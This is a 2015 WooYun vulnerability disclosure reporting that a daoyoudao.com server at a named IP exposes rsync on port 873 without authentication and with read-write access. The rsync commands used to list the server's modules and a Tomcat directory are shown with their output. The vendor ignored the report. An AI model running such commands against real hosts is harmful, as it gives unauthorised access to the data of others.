当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0107721
漏洞标题:
道有道某服务器未授权访问可上传文件第二弹
相关厂商:
daoyoudao.com
漏洞作者:
几何黑店
提交时间:
2015-04-15 09:38
修复时间:
2015-04-20 14:22
公开时间:
2015-04-20 14:22
漏洞类型:
系统/服务运维配置不当
危害等级:
自评Rank:
20
漏洞状态:
漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-04-15: 细节已通知厂商并且等待厂商处理中
2015-04-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

道有道某服务器未授权访问可上传文件第二弹

详细说明:

211.144.151.231 端口873
还是rsync未授权访问,可读写权限

root@kali:~# rsync -v 211.144.151.231::
Welcome to use  the rsync services!
terry          	terry 's directory from 10.172.0.201
youday         	youday 's directory from 10.172.0.201
pkgame-platform	pkgame-platform 's directory from 10.172.0.201
pkgame-union-images	pkgame-union-images
industry_qy    	industry_qy
industry_iwei  	industry_iwei
tomcat-iwei    	tomcat-iwei
tomcat-qy      	tomcat-qy
qy-log         	qy-log
tomcat-tttt    	tomcat-tttt

漏洞证明:

root@kali:~# rsync -v 211.144.151.231::tomcat-iwei
Welcome to use  the rsync services!
receiving file list ... done
drwxr-xr-x        4096 2014/09/19 19:27:10 .
-rw-r--r--       37951 2013/12/23 19:04:57 LICENSE
-rw-r--r--         558 2013/12/23 19:04:57 NOTICE
-rw-r--r--        8680 2013/12/23 19:04:57 RELEASE-NOTES
-rw-r--r--        6670 2013/12/23 19:04:57 RUNNING.txt
drwxr-xr-x        4096 2015/02/12 20:31:47 bin
drwxr-xr-x        4096 2015/02/12 20:30:05 conf
drwxr-xr-x        4096 2013/12/23 19:04:57 lib
drwxr-xr-x       65536 2015/04/13 08:23:42 logs
drwxr-xr-x        4096 2013/12/23 19:04:04 temp
drwxr-xr-x        4096 2013/12/23 19:04:57 webapps
drwxr-xr-x        4096 2014/09/19 19:27:10 work

修复方案:

你懂的

版权声明:转载请注明来源 几何黑店@乌云

>

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-20 14:22

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无